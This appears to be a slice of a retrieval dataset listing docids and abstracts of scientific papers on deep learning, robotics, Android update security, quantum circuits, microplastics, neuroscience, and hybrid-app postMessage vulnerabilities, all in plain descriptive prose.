"text": "Unsupervised learning and supervised learning are key research topics in deep learning. However, as high-capacity supervised neural networks trained with a large amount of labels have achieved remarkable success in many computer vision tasks, the availability of large-scale labeled images reduced the significance of unsupervised learning. Inspired by the recent trend toward revisiting the importance of unsupervised learning, we investigate joint supervised and unsupervised learning in a large-scale setting by augmenting existing neural networks with decoding pathways for reconstruction. First, we demonstrate that the intermediate activations of pretrained large-scale classification networks preserve almost all the information of input images except a portion of local spatial details. Then, by end-to-end training of the entire augmented architecture with the reconstructive objective, we show improvement of the network performance for supervised tasks. We evaluate several variants of autoencoders, including the recently proposed “what-where\" autoencoder that uses the encoder pooling switches, to study the importance of the architecture design. Taking the 16-layer VGGNet trained under the ImageNet ILSVRC 2012 protocol as a strong baseline for image classification, our methods improve the validation-set accuracy by a noticeable margin.",
"title": ""
},
{
"docid": "c0e157abffae2a861346017fd0257668",
"text": "We present a comprehensive approach to handle perception uncertainty to reduce failure rates in robotic bin-picking. Our focus is on mixed-bins. We identify the main failure modes at various stages of the binpicking task and present methods to recover from them. If uncertainty in part detection leads to perception failure, then human intervention is invoked. Our approach estimates the confidence in the part match provided by an automated perception system, which is used to detect perception failures. Human intervention is also invoked if uncertainty in estimated part location and orientation leads to a singulation planning failure. We have developed a user interface that enables remote human interventions when necessary. Finally, if uncertainty in part posture in the gripper leads to failure in placing the part with the desired accuracy, sensor-less fine-positioning moves are used to correct the final placement errors. We have developed a fine-positioning planner with a suite of fine-motion strategies that offer different tradeoffs between completion time and postural accuracy at the destination. We report our observations from system characterization experiments with a dual-armed Baxter robot, equipped with a Ensenso three-dimensional camera, to perform bin-picking on mixed-bins. & 2016 Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "d5007c061227ec76a4e8ea795471db00",
"text": "The ramp loss is a robust but non-convex loss for classification. Compared with other non-convex losses, a local minimum of the ramp loss can be effectively found. The effectiveness of local search comes from the piecewise linearity of the ramp loss. Motivated by the fact that the `1-penalty is piecewise linear as well, the `1-penalty is applied for the ramp loss, resulting in a ramp loss linear programming support vector machine (rampLPSVM). The proposed ramp-LPSVM is a piecewise linear minimization problem and the related optimization techniques are applicable. Moreover, the `1-penalty can enhance the sparsity. In this paper, the corresponding misclassification error and convergence behavior are discussed. Generally, the ramp loss is a truncated hinge loss. Therefore ramp-LPSVM possesses some similar properties as hinge loss SVMs. A local minimization algorithm and a global search strategy are discussed. The good optimization capability of the proposed algorithms makes ramp-LPSVM perform well in numerical experiments: the result of rampLPSVM is more robust than that of hinge SVMs and is sparser than that of ramp-SVM, which consists of the ‖ · ‖K-penalty and the ramp loss.",
"title": ""
},
{
"docid": "c96dbf6084741f8b529e8a1de19cf109",
"text": "Metamorphic testing is an advanced technique to test programs without a true test oracle such as machine learning applications. Because these programs have no general oracle to identify their correctness, traditional testing techniques such as unit testing may not be helpful for developers to detect potential bugs. This paper presents a novel system, Kabu, which can dynamically infer properties of methods' states in programs that describe the characteristics of a method before and after transforming its input. These Metamorphic Properties (MPs) are pivotal to detecting potential bugs in programs without test oracles, but most previous work relies solely on human effort to identify them and only considers MPs between input parameters and output result (return value) of a program or method. This paper also proposes a testing concept, Metamorphic Differential Testing (MDT). By detecting different sets of MPs between different versions for the same method, Kabu reports potential bugs for human review. We have performed a preliminary evaluation of Kabu by comparing the MPs detected by humans with the MPs detected by Kabu. Our preliminary results are promising: Kabu can find more MPs than human developers, and MDT is effective at detecting function changes in methods.",
"title": ""
},
{
"docid": "dd52742343462b3106c18274c143928b",
"text": "This paper presents a descriptive account of the social practices surrounding the iTunes music sharing of 13 participants in one organizational setting. Specifically, we characterize adoption, critical mass, and privacy; impression management and access control; the musical impressions of others that are created as a result of music sharing; the ways in which participants attempted to make sense of the dynamic system; and implications of the overlaid technical, musical, and corporate topologies. We interleave design implications throughout our results and relate those results to broader themes in a music sharing design space.",
"title": ""
},
{
"docid": "45fb31643f4fd53b08c51818f284f2df",
"text": "This paper introduces a new type of fuzzy inference systems, denoted as dynamic evolving neural-fuzzy inference system (DENFIS), for adaptive online and offline learning, and their application for dynamic time series prediction. DENFIS evolve through incremental, hybrid (supervised/unsupervised), learning, and accommodate new input data, including new features, new classes, etc., through local element tuning. New fuzzy rules are created and updated during the operation of the system. At each time moment, the output of DENFIS is calculated through a fuzzy inference system based on -most activated fuzzy rules which are dynamically chosen from a fuzzy rule set. Two approaches are proposed: 1) dynamic creation of a first-order Takagi–Sugeno-type fuzzy rule set for a DENFIS online model; and 2) creation of a first-order Takagi–Sugeno-type fuzzy rule set, or an expanded high-order one, for a DENFIS offline model. A set of fuzzy rules can be inserted into DENFIS before or during its learning process. Fuzzy rules can also be extracted during or after the learning process. An evolving clustering method (ECM), which is employed in both online and offline DENFIS models, is also introduced. It is demonstrated that DENFIS can effectively learn complex temporal sequences in an adaptive way and outperform some well-known, existing models.",
"title": ""
},
{
"docid": "fc32d0734ea83a4252339c6a2f98b0ee",
"text": "The security of Android depends on the timely delivery of updates to fix critical vulnerabilities. In this paper we map the complex network of players in the Android ecosystem who must collaborate to provide updates, and determine that inaction by some manufacturers and network operators means many handsets are vulnerable to critical vulnerabilities. We define the FUM security metric to rank the performance of device manufacturers and network operators, based on their provision of updates and exposure to critical vulnerabilities. Using a corpus of 20 400 devices we show that there is significant variability in the timely delivery of security updates across different device manufacturers and network operators. This provides a comparison point for purchasers and regulators to determine which device manufacturers and network operators provide security updates and which do not. We find that on average 87.7% of Android devices are exposed to at least one of 11 known critical vulnerabilities and, across the ecosystem as a whole, assign a FUM security score of 2.87 out of 10. In our data, Nexus devices do considerably better than average with a score of 5.17; and LG is the best manufacturer with a score of 3.97.",
"title": ""
},
{
"docid": "c956c6d99053b44557cfed93f12dc1bc",
"text": "We present a device demonstrating a lithographically patterned transmon integrated with a micromachined cavity resonator. Our two-cavity, one-qubit device is a multilayer microwave-integrated quantum circuit (MMIQC), comprising a basic unit capable of performing circuit-QED operations. We describe the qubit-cavity coupling mechanism of a specialized geometry using an electric-field picture and a circuit model, and obtain specific system parameters using simulations. Fabrication of the MMIQC includes lithography, etching, and metallic bonding of silicon wafers. Superconducting wafer bonding is a critical capability that is demonstrated by a micromachined storage-cavity lifetime of 34.3 μs, corresponding to a quality factor of 2 × 10 at single-photon energies. The transmon coherence times are T1 1⁄4 6.4 μs, and Techo 2 1⁄4 11.7 μs. We measure qubit-cavity dispersive coupling with a rate χqμ=2π 1⁄4 −1.17 MHz, constituting a Jaynes-Cummings system with an interaction strength g=2π 1⁄4 49 MHz. With these parameters we are able to demonstrate circuit-QED operations in the strong dispersive regime with ease. Finally, we highlight several improvements and anticipated extensions of the technology to complex MMIQCs.",
"title": ""
},
{
"docid": "ff0e93146ae9e6c099a27228d1735422",
"text": "The prevalence of big data technology has generated increasing demands in large-scale streaming data processing. However, for certain tasks it is still challenging to appropriately select a platform due to the diversity of choices and the complexity of configurations. This paper focuses on benchmarking some principal streaming platforms. We achieve our goals on StreamBench, a streaming benchmark tool based on which we introduce proper modifications and extensions. We then accomplish performance comparisons among different big data platforms, including Apache Spark, Apache Storm and Apache Samza. In terms of performance criteria, we consider both computational capability and fault-tolerance ability. Finally, we give a summary on some key knobs for performance tuning as well as on hardware utilization.",
"title": ""
},
{
"docid": "bf4b6cd15c0b3ddb5892f1baea9dec68",
"text": "The purpose of this study was to examine the distribution, abundance and characteristics of plastic particles in plankton samples collected routinely in Northeast Pacific ecosystems, and to contribute to the development of ideas for future research into the occurrence and impact of small plastic debris in marine pelagic ecosystems. Plastic debris particles were assessed from zooplankton samples collected as part of the National Oceanic and Atmospheric Administration's (NOAA) ongoing ecosystem surveys during two research cruises in the Southeast Bering Sea in the spring and fall of 2006 and four research cruises off the U.S. west coast (primarily off southern California) in spring, summer and fall of 2006, and in January of 2007. Nets with 0.505 mm mesh were used to collect surface samples during all cruises, and sub-surface samples during the four cruises off the west coast. The 595 plankton samples processed indicate that plastic particles are widely distributed in surface waters. The proportion of surface samples from each cruise that contained particles of plastic ranged from 8.75 to 84.0%, whereas particles were recorded in sub-surface samples from only one cruise (in 28.2% of the January 2007 samples). Spatial and temporal variability was apparent in the abundance and distribution of the plastic particles and mean standardized quantities varied among cruises with ranges of 0.004-0.19 particles/m³, and 0.014-0.209 mg dry mass/m³. Off southern California, quantities for the winter cruise were significantly higher, and for the spring cruise significantly lower than for the summer and fall surveys (surface data). Differences between surface particle concentrations and mass for the Bering Sea and California coast surveys were significant for pair-wise comparisons of the spring but not the fall cruises. The particles were assigned to three plastic product types: product fragments, fishing net and line fibers, and industrial pellets; and five size categories: <1 mm, 1-2.5 mm, >2.5-5 mm, >5-10 mm, and >10 mm. Product fragments accounted for the majority of the particles, and most were less than 2.5 mm in size. The ubiquity of such particles in the survey areas and predominance of sizes <2.5 mm implies persistence in these pelagic ecosystems as a result of continuous breakdown from larger plastic debris fragments, and widespread distribution by ocean currents. Detailed investigations of the trophic ecology of individual zooplankton species, and their encounter rates with various size ranges of plastic particles in the marine pelagic environment, are required in order to understand the potential for ingestion of such debris particles by these organisms. Ongoing plankton sampling programs by marine research institutes in large marine ecosystems are good potential sources of data for continued assessment of the abundance, distribution and potential impact of small plastic debris in productive coastal pelagic zones.",
"title": ""
},
{
"docid": "6646b66370ed02eb84661c8505eb7563",
"text": "Re-identification is generally carried out by encoding the appearance of a subject in terms of outfit, suggesting scenarios where people do not change their attire. In this paper we overcome this restriction, by proposing a framework based on a deep convolutional neural network, SOMAnet, that additionally models other discriminative aspects, namely, structural attributes of the human figure (e.g. height, obesity, gender). Our method is unique in many respects. First, SOMAnet is based on the Inception architecture, departing from the usual siamese framework. This spares expensive data preparation (pairing images across cameras) and allows the understanding of what the network learned. Second, and most notably, the training data consists of a synthetic 100K instance dataset, SOMAset, created by photorealistic human body generation software. Synthetic data represents a good compromise between realistic imagery, usually not required in re-identification since surveillance cameras capture low-resolution silhouettes, and complete control of the samples, which is useful in order to customize the data w.r.t. the surveillance scenario at-hand, e.g. ethnicity. SOMAnet, trained on SOMAset and fine-tuned on recent re-identification benchmarks, outperforms all competitors, matching subjects even with different apparel. The combination of synthetic data with Inception architectures opens up new research avenues in re-identification.",
"title": ""
},
{
"docid": "569700bd1114b1b93a13af25b2051631",
"text": "Empathy and sympathy play crucial roles in much of human social interaction and are necessary components for healthy coexistence. Sympathy is thought to be a proxy for motivating prosocial behavior and providing the affective and motivational base for moral development. The purpose of the present study was to use functional MRI to characterize developmental changes in brain activation in the neural circuits underpinning empathy and sympathy. Fifty-seven individuals, whose age ranged from 7 to 40 years old, were presented with short animated visual stimuli depicting painful and non-painful situations. These situations involved either a person whose pain was accidentally caused or a person whose pain was intentionally inflicted by another individual to elicit empathic (feeling as the other) or sympathetic (feeling concern for the other) emotions, respectively. Results demonstrate monotonic age-related changes in the amygdala, supplementary motor area, and posterior insula when participants were exposed to painful situations that were accidentally caused. When participants observed painful situations intentionally inflicted by another individual, age-related changes were detected in the dorsolateral prefrontal and ventromedial prefrontal cortex, with a gradual shift in that latter region from its medial to its lateral portion. This pattern of activation reflects a change from a visceral emotional response critical for the analysis of the affective significance of stimuli to a more evaluative function. Further, these data provide evidence for partially distinct neural mechanisms subserving empathy and sympathy, and demonstrate the usefulness of a developmental neurobiological approach to the new emerging area of moral neuroscience.",
"title": ""
},
{
"docid": "bf0b08e7d39646a72f92b7fda791e33b",
"text": "Knowledge distillation (KD) aims to train a lightweight classifier suitable to provide accurate inference with constrained resources in multi-label learning. Instead of directly consuming feature-label pairs, the classifier is trained by a teacher, i.e., a high-capacity model whose training may be resource-hungry. The accuracy of the classifier trained this way is usually suboptimal because it is difficult to learn the true data distribution from the teacher. An alternative method is to adversarially train the classifier against a discriminator in a two-player game akin to generative adversarial networks (GAN), which can ensure the classifier to learn the true data distribution at the equilibrium of this game. However, it may take excessively long time for such a two-player game to reach equilibrium due to high-variance gradient updates. To address these limitations, we propose a three-player game named KDGAN consisting of a classifier, a teacher, and a discriminator. The classifier and the teacher learn from each other via distillation losses and are adversarially trained against the discriminator via adversarial losses. By simultaneously optimizing the distillation and adversarial losses, the classifier will learn the true data distribution at the equilibrium. We approximate the discrete distribution learned by the classifier (or the teacher) with a concrete distribution. From the concrete distribution, we generate continuous samples to obtain low-variance gradient updates, which speed up the training. Extensive experiments using real datasets confirm the superiority of KDGAN in both accuracy and training speed.",
"title": ""
},
{
"docid": "e2630765e2fa4b203a4250cb5b69b9e9",
"text": "Thirteen years have passed since Karl Sims published his work onevolving virtual creatures. Since then,several novel approaches toneural network evolution and genetic algorithms have been proposed.The aim of our work is to apply recent results in these areas tothe virtual creatures proposed by Karl Sims, leading to creaturescapable of solving more complex tasks. This paper presents oursuccess in reaching the first milestone -a new and completeimplementation of the original virtual creatures. All morphologicaland control properties of the original creatures were implemented.Laws of physics are simulated using ODE library. Distributedcomputation is used for CPU-intensive tasks, such as fitnessevaluation.Experiments have shown that our system is capable ofevolving both morphology and control of the creatures resulting ina variety of non-trivial swimming and walking strategies.",
"title": ""
},
{
"docid": "0847b2b9270bc39a1273edfdfa022345",
"text": "This paper presents the analysis, design and measurement of novel, low-profile, small-footprint folded monopoles employing planar metamaterial phase-shifting lines. These lines are composed of fully-printed spiral elements, that are inductively coupled and hence exhibit an effective high- mu property. An equivalent circuit for the proposed structure is presented, validating the operating principles of the antenna and the metamaterial line. The impact of the antenna profile and the ground plane size on the antenna performance is investigated using accurate full-wave simulations. A lambda/9 antenna prototype, designed to operate at 2.36 GHz, is fabricated and tested on both electrically large and small ground planes, achieving on average 80% radiation efficiency, 5% (110 MHz) and 2.5% (55 MHz) -10 dB measured bandwidths, respectively, and fully omnidirectional, vertically polarized, monopole-type radiation patterns.",
"title": ""
},
{
"docid": "a9d92ae26a2e1023402c2c7c760b8074",
"text": "We examined the psychometric properties of the Big Five personality traits assessed through social networking profiles in 2 studies consisting of 274 and 244 social networking website (SNW) users. First, SNW ratings demonstrated sufficient interrater reliability and internal consistency. Second, ratings via SNWs demonstrated convergent validity with self-ratings of the Big Five traits. Third, SNW ratings correlated with job performance, hirability, and academic performance criteria; and the magnitude of these correlations was generally larger than for self-ratings. Finally, SNW ratings accounted for significant variance in the criterion measures beyond self-ratings of personality and cognitive ability. We suggest that SNWs may provide useful information for potential use in organizational research and practice, taking into consideration various legal and ethical issues.jasp_881 1..30",
"title": ""
}
] | scidocsrr |
fca8055920c4b47663301888f450b3b7 | PyDEC: Software and Algorithms for Discretization of Exterior Calculus | [
{
"docid": "ba48363904648269176e05cec16fcf7f",
"text": "We present a theory and applications of discrete exterior calculus on simplicial complexes of arbitrary finite dimension. This can be thought of as calculus on a discrete space. Our theory includes not only discrete differential forms but also discrete vector fields and the operators acting on these objects. This allows us to address the various interactions between forms and vector fields (such as Lie derivatives) which are important in applications. Previous attempts at discrete exterior calculus have addressed only differential forms. We also introduce the notion of a circumcentric dual of a simplicial complex. The importance of dual complexes in this field has been well understood, but previous researchers have used barycentric subdivision or barycentric duals. We show that the use of circumcentric duals is crucial in arriving at a theory of discrete exterior calculus that admits both vector fields and forms.",
"title": ""
}
] | [
{
"docid": "71da47c6837022a80dccabb0a1f5c00e",
"text": "The treatment of obesity and cardiovascular diseases is one of the most difficult and important challenges nowadays. Weight loss is frequently offered as a therapy and is aimed at improving some of the components of the metabolic syndrome. Among various diets, ketogenic diets, which are very low in carbohydrates and usually high in fats and/or proteins, have gained in popularity. Results regarding the impact of such diets on cardiovascular risk factors are controversial, both in animals and humans, but some improvements notably in obesity and type 2 diabetes have been described. Unfortunately, these effects seem to be limited in time. Moreover, these diets are not totally safe and can be associated with some adverse events. Notably, in rodents, development of nonalcoholic fatty liver disease (NAFLD) and insulin resistance have been described. The aim of this review is to discuss the role of ketogenic diets on different cardiovascular risk factors in both animals and humans based on available evidence.",
"title": ""
},
{
"docid": "a11c3f75f6ced7f43e3beeb795948436",
"text": "A new concept of building the controller of a thyristor based three-phase dual converter is presented in this paper. The controller is implemented using mixed mode digital-analog circuitry to achieve optimized performance. The realtime six state pulse patterns needed for the converter are generated by a specially designed ROM based circuit synchronized to the power frequency by a phase-locked-loop. The phase angle and other necessary commands for the converter are managed by an AT89C51 microcontroller. The proposed architecture offers 128-steps in the phase angle control, a resolution sufficient for most converter applications. Because of the hybrid nature of the implementation, the controller can change phase angles online smoothly. The computation burden on the microcontroller is nominal and hence it can easily undertake the tasks of monitoring diagnostic data like overload, loss of excitation and phase sequence. Thus a full fledged system is realizable with only one microcontroller chip, making the control system economic, reliable and efficient.",
"title": ""
},
{
"docid": "5d9d507a8bdd0d356d7ac220d9b0ef70",
"text": "This paper provides insights of possible plagiarism detection approach based on modern technologies – programming assignment versioning, auto-testing and abstract syntax tree comparison to estimate code similarities. Keywords—automation; assignment; testing; continuous integration INTRODUCTION In the emerging world of information technologies, a growing number of students is choosing this specialization for their education. Therefore, the number of homework and laboratory research assignments that should be tested is also growing. The majority of these tasks is based on the necessity to implement some algorithm as a small program. This article discusses the possible solutions to the problem of automated testing of programming laboratory research assignments. The course “Algorithmization and Programming of Solutions” is offered to all the first-year students of The Faculty of Computer Science and Information Technology (~500 students) in Riga Technical University and it provides the students the basics of the algorithmization of computing processes and the technology of program design using Java programming language (the given course and the University will be considered as an example of the implementation of the automated testing). During the course eight laboratory research assignments are planned, where the student has to develop an algorithm, create a program and submit it to the education portal of the University. The VBA test program was designed as one of the solutions, the requirements for each laboratory assignment were determined and the special tests have been created. At some point, however, the VBA offered options were no longer able to meet the requirements, therefore the activities on identifying the requirements for the automation of the whole cycle of programming work reception, testing and evaluation have begun. I. PLAGIARISM DETECTION APPROACHES To identify possible plagiarism detection techniques, it is imperative to define scoring or detecting threshold. Surely it is not an easy task, since only identical works can be considered as “true” plagiarism. In all other cases a person must make his decision whether two pieces of code are identical by their means or not. However, it is possible to outline some widespread approaches of assessment comparison. A. Manual Work Comparison In this case, all works must be compared one-by-one. Surely, this approach will lead to progressively increasing error rate due to human memory and cognitive function limitations. Large student group homework assessment verification can take long time, which is another contributing factor to errorrate increase. B. Diff-tool Application It is possible to compare two code fragments using semiautomated diff tool which provides information about Levenshtein distance between fragments. Although several visualization tools exist, it is quite easy to fool algorithm to believe that a code has multiple different elements in it, but all of them are actually another name for variables/functions/etc. without any additional contribution. C. Abstract Syntax Tree (AST) comparison Abstract syntax tree is a tree representation of the abstract syntactic structure of source code written in a programming language. Each node of the tree denotes a construct occurring in the source code. Example of AST is shown on Fig. 1.syntax tree is a tree representation of the abstract syntactic structure of source code written in a programming language. Each node of the tree denotes a construct occurring in the source code. Example of AST is shown on Fig. 1.",
"title": ""
},
{
"docid": "eb9973ea01e6d55eb19912d2a437af30",
"text": "Stochastic descent methods (of the gradient and mirror varieties) have become increasingly popular in optimization. In fact, it is now widely recognized that the success of deep learning is not only due to the special deep architecture of the models, but also due to the behavior of the stochastic descent methods used, which play a key role in reaching “good” solutions that generalize well to unseen data. In an attempt to shed some light on why this is the case, we revisit some minimax properties of stochastic gradient descent (SGD) for the square loss of linear models—originally developed in the 1990’s—and extend them to general stochastic mirror descent (SMD) algorithms for general loss functions and nonlinear models. In particular, we show that there is a fundamental identity which holds for SMD (and SGD) under very general conditions, and which implies the minimax optimality of SMD (and SGD) for sufficiently small step size, and for a general class of loss functions and general nonlinear models. We further show that this identity can be used to naturally establish other properties of SMD (and SGD), namely convergence and implicit regularization for over-parameterized linear models (in what is now being called the “interpolating regime”), some of which have been shown in certain cases in prior literature. We also argue how this identity can be used in the so-called “highly over-parameterized” nonlinear setting (where the number of parameters far exceeds the number of data points) to provide insights into why SMD (and SGD) may have similar convergence and implicit regularization properties for deep learning.",
"title": ""
},
{
"docid": "e5da4f6a9abd5f1c751a366768d8456c",
"text": "We report on the design, optimization, and performance evaluation of a new wheel-leg hybrid robot. This robot utilizes a novel transformable wheel that combines the advantages of both circular and legged wheels. To minimize the complexity of the design, the transformation process of the wheel is passive, which eliminates the need for additional actuators. A new triggering mechanism is also employed to increase the transformation success rate. To maximize the climbing ability in legged-wheel mode, the design parameters for the transformable wheel and robot are tuned based on behavioral analyses. The performance of our new development is evaluated in terms of stability, energy efficiency, and the maximum height of an obstacle that the robot can climb over. With the new transformable wheel, the robot can climb over an obstacle 3.25 times as tall as its wheel radius, without compromising its driving ability at a speed of 2.4 body lengths/s with a specific resistance of 0.7 on a flat surface.",
"title": ""
},
{
"docid": "d7b638eae20bc28e2042f4666ec1c97f",
"text": "Finding informative genes from microarray data is an important research problem in bioinformatics research and applications. Most of the existing methods rank features according to their discriminative capability and then find a subset of discriminative genes (usually top k genes). In particular, t-statistic criterion and its variants have been adopted extensively. This kind of methods rely on the statistics principle of t-test, which requires that the data follows a normal distribution. However, according to our investigation, the normality condition often cannot be met in real data sets.To avoid the assumption of the normality condition, in this paper, we propose a rank sum test method for informative gene discovery. The method uses a rank-sum statistic as the ranking criterion. Moreover, we propose using the significance level threshold, instead of the number of informative genes, as the parameter. The significance level threshold as a parameter carries the quality specification in statistics. We follow the Pitman efficiency theory to show that the rank sum method is more accurate and more robust than the t-statistic method in theory.To verify the effectiveness of the rank sum method, we use support vector machine (SVM) to construct classifiers based on the identified informative genes on two well known data sets, namely colon data and leukemia data. The prediction accuracy reaches 96.2% on the colon data and 100% on the leukemia data. The results are clearly better than those from the previous feature ranking methods. By experiments, we also verify that using significance level threshold is more effective than directly specifying an arbitrary k.",
"title": ""
},
{
"docid": "43dff9898114fa6fedecc9b54b8acc11",
"text": "In medical diagnostic application, early defect detection is a crucial task as it provides critical insight into diagnosis. Medical imaging technique is actively developing field inengineering. Magnetic Resonance imaging (MRI) is one those reliable imaging techniques on which medical diagnostic is based upon. Manual inspection of those images is a tedious job as the amount of data and minute details are hard to recognize by the human. For this automating those techniques are very crucial. In this paper, we are proposing a method which can be utilized to make tumor detection easier. The MRI deals with the complicated problem of brain tumor detection. Due to its complexity and variance getting better accuracy is a challenge. Using Adaboost machine learning algorithm we can improve over accuracy issue. The proposed system consists of three parts such as Preprocessing, Feature extraction and Classification. Preprocessing has removed noise in the raw data, for feature extraction we used GLCM (Gray Level Co- occurrence Matrix) and for classification boosting technique used (Adaboost).",
"title": ""
},
{
"docid": "7ab15804bd53aa8288aafc5374a12499",
"text": "We have used a modified technique in five patients to correct winging of the scapula caused by injury to the brachial plexus or the long thoracic nerve during transaxillary resection of the first rib. The procedure stabilises the scapulothoracic articulation by using strips of autogenous fascia lata wrapped around the 4th, 6th and 7th ribs at least two, and preferably three, times. The mean age of the patients at the time of operation was 38 years (26 to 47) and the mean follow-up six years and four months (three years and three months to 11 years). Satisfactory stability was achieved in all patients with considerable improvement in shoulder function. There were no complications.",
"title": ""
},
{
"docid": "67731fe25f024540a46b084f42271e70",
"text": "Obstacle avoidance is a fundamental requirement for autonomous robots which operate in, and interact with, the real world. When perception is limited to monocular vision avoiding collision becomes significantly more challenging due to the lack of 3D information. Conventional path planners for obstacle avoidance require tuning a number of parameters and do not have the ability to directly benefit from large datasets and continuous use. In this paper, a dueling architecture based deep double-Q network (D3QN) is proposed for obstacle avoidance, using only monocular RGB vision. Based on the dueling and double-Q mechanisms, D3QN can efficiently learn how to avoid obstacles in a simulator even with very noisy depth information predicted from RGB image. Extensive experiments show that D3QN enables twofold acceleration on learning compared with a normal deep Q network and the models trained solely in virtual environments can be directly transferred to real robots, generalizing well to various new environments with previously unseen dynamic objects.",
"title": ""
},
{
"docid": "40555c2dc50a099ff129f60631f59c0d",
"text": "As new technologies and information delivery systems emerge, the way in which individuals search for information to support research, teaching, and creative activities is changing. To understand different aspects of researchers’ information-seeking behavior, this article surveyed 2,063 academic researchers in natural science, engineering, and medical science from five research universities in the United States. A Web-based, in-depth questionnaire was designed to quantify researchers’ information searching, information use, and information storage behaviors. Descriptive statistics are reported.",
"title": ""
},
{
"docid": "c060f75acd562c535ad655f82fa1163b",
"text": "can be found at: Structural Health Monitoring Additional services and information for http://shm.sagepub.com/cgi/alerts Email Alerts: http://shm.sagepub.com/subscriptions Subscriptions: http://www.sagepub.com/journalsReprints.nav Reprints: http://www.sagepub.com/journalsPermissions.nav Permissions: http://shm.sagepub.com/cgi/content/refs/2/3/257 SAGE Journals Online and HighWire Press platforms): (this article cites 14 articles hosted on the Citations",
"title": ""
},
{
"docid": "f90bc248d18b2b37f37f762d758a4cb3",
"text": "postMessage is popular in HTML5 based web apps to allow the communication between different origins. With the increasing popularity of the embedded browser (i.e., WebView) in mobile apps (i.e., hybrid apps), postMessage has found utility in these apps. However, different from web apps, hybrid apps have a unique requirement that their native code (e.g., Java for Android) also needs to exchange messages with web code loaded in WebView. To bridge the gap, developers typically extend postMessage by treating the native context as a new frame, and allowing the communication between the new frame and the web frames. We term such extended postMessage \"hybrid postMessage\" in this paper. We find that hybrid postMessage introduces new critical security flaws: all origin information of a message is not respected or even lost during the message delivery in hybrid postMessage. If adversaries inject malicious code into WebView, the malicious code may leverage the flaws to passively monitor messages that may contain sensitive information, or actively send messages to arbitrary message receivers and access their internal functionalities and data. We term the novel security issue caused by hybrid postMessage \"Origin Stripping Vulnerability\" (OSV). In this paper, our contributions are fourfold. First, we conduct the first systematic study on OSV. Second, we propose a lightweight detection tool against OSV, called OSV-Hunter. Third, we evaluate OSV-Hunter using a set of popular apps. We found that 74 apps implemented hybrid postMessage, and all these apps suffered from OSV, which might be exploited by adversaries to perform remote real-time microphone monitoring, data race, internal data manipulation, denial of service (DoS) attacks and so on. Several popular development frameworks, libraries (such as the Facebook React Native framework, and the Google cloud print library) and apps (such as Adobe Reader and WPS office) are impacted. Lastly, to mitigate OSV from the root, we design and implement three new postMessage APIs, called OSV-Free. Our evaluation shows that OSV-Free is secure and fast, and it is generic and resilient to the notorious Android fragmentation problem. We also demonstrate that OSV-Free is easy to use, by applying OSV-Free to harden the complex \"Facebook React Native\" framework. OSV-Free is open source, and its source code and more implementation and evaluation details are available online.",
"title": ""
},
{
"docid": "18c56e9d096ba4ea48a0579626f83edc",
"text": "PURPOSE\nThe purpose of this study was to provide an overview of platelet-rich plasma (PRP) injected into the scalp for the management of androgenic alopecia.\n\n\nMATERIALS AND METHODS\nA literature review was performed to evaluate the benefits of PRP in androgenic alopecia.\n\n\nRESULTS\nHair restoration has been increasing. PRP's main components of platelet-derived growth factor, transforming growth factor, and vascular endothelial growth factor have the potential to stimulate hard and soft tissue wound healing. In general, PRP showed a benefit on patients with androgenic alopecia, including increased hair density and quality. Currently, different PRP preparations are being used with no standard technique.\n\n\nCONCLUSION\nThis review found beneficial effects of PRP on androgenic alopecia. However, more rigorous study designs, including larger samples, quantitative measurements of effect, and longer follow-up periods, are needed to solidify the utility of PRP for treating patients with androgenic alopecia.",
"title": ""
},
{
"docid": "87a296ad9c3dd7b32b7ed876b9132fb2",
"text": "Reservoir Computing is an attractive paradigm of recurrent neural network architecture, due to the ease of training and existing neuromorphic implementations. Successively applied on speech recognition and time series forecasting, few works have so far studied the behavior of such networks on computer vision tasks. Therefore we decided to investigate the ability of Echo State Networks to classify the digits of the MNIST database. We show that even if ESNs are not able to outperform state-of-the-art convolutional networks, they allow low error thanks to a suitable preprocessing of images. The best performance is obtained with a large reservoir of 4,000~neurons, but committees of smaller reservoirs are also appealing and might be further investigated.",
"title": ""
},
{
"docid": "f32477f15fb7f550c74bc052c487a14b",
"text": "This paper demonstrates the sketch drawing capability of NAO humanoid robot. Two redundant degrees of freedom elbow yaw (RElbowYaw) and wrist yaw (RWristYaw) of the right hand have been sacrificed because of their less contribution in drawing. The Denavit-Hartenberg (DH) parameters of the system has been defined in order to measure the working envelop of the right hand as well as to achieve the inverse kinematic solution. A linear transformation has been used to transform the image points with respect to real world coordinate system and novel 4 point calibration technique has been proposed to calibrate the real world coordinate system with respect to NAO end effector.",
"title": ""
},
{
"docid": "9e7998cce943fa2b60f4d4773bc51e40",
"text": "This paper presents a novel technique to correct for bias in a classical estimator using a learning approach. We apply a learned bias correction to a lidar-only motion estimation pipeline. Our technique trains a Gaussian process (GP) regression model using data with ground truth. The inputs to the model are high-level features derived from the geometry of the point-clouds, and the outputs are the predicted biases between poses computed by the estimator and the ground truth. The predicted biases are applied as a correction to the poses computed by the estimator. Our technique is evaluated on over 50km of lidar data, which includes the KITTI odometry benchmark and lidar datasets collected around the University of Toronto campus. After applying the learned bias correction, we obtained significant improvements to lidar odometry in all datasets tested. We achieved around 10% reduction in errors on all datasets from an already accurate lidar odometry algorithm, at the expense of only less than 1% increase in computational cost at run-time.",
"title": ""
},
{
"docid": "07d588e80307ef24a8644e453ff4dace",
"text": "This paper outlines the burden of oral diseases worldwide and describes the influence of major sociobehavioural risk factors in oral health. Despite great improvements in the oral health of populations in several countries, global problems still persist. The burden of oral disease is particularly high for the disadvantaged and poor population groups in both developing and developed countries. Oral diseases such as dental caries, periodontal disease, tooth loss, oral mucosal lesions and oropharyngeal cancers, human immunodeficiency virus/acquired immunodeficiency syndrome (HIV/AIDS)-related oral disease and orodental trauma are major public health problems worldwide and poor oral health has a profound effect on general health and quality of life. The diversity in oral disease patterns and development trends across countries and regions reflects distinct risk profiles and the establishment of preventive oral health care programmes. The important role of sociobehavioural and environmental factors in oral health and disease has been shown in a large number of socioepidemiological surveys. In addition to poor living conditions, the major risk factors relate to unhealthy lifestyles (i.e. poor diet, nutrition and oral hygiene and use of tobacco and alcohol), and limited availability and accessibility of oral health services. Several oral diseases are linked to noncommunicable chronic diseases primarily because of common risk factors. Moreover, general diseases often have oral manifestations (e.g. diabetes or HIV/AIDS). Worldwide strengthening of public health programmes through the implementation of effective measures for the prevention of oral disease and promotion of oral health is urgently needed. The challenges of improving oral health are particularly great in developing countries.",
"title": ""
},
{
"docid": "c8f97cc28c124f08c161898f1c1023ad",
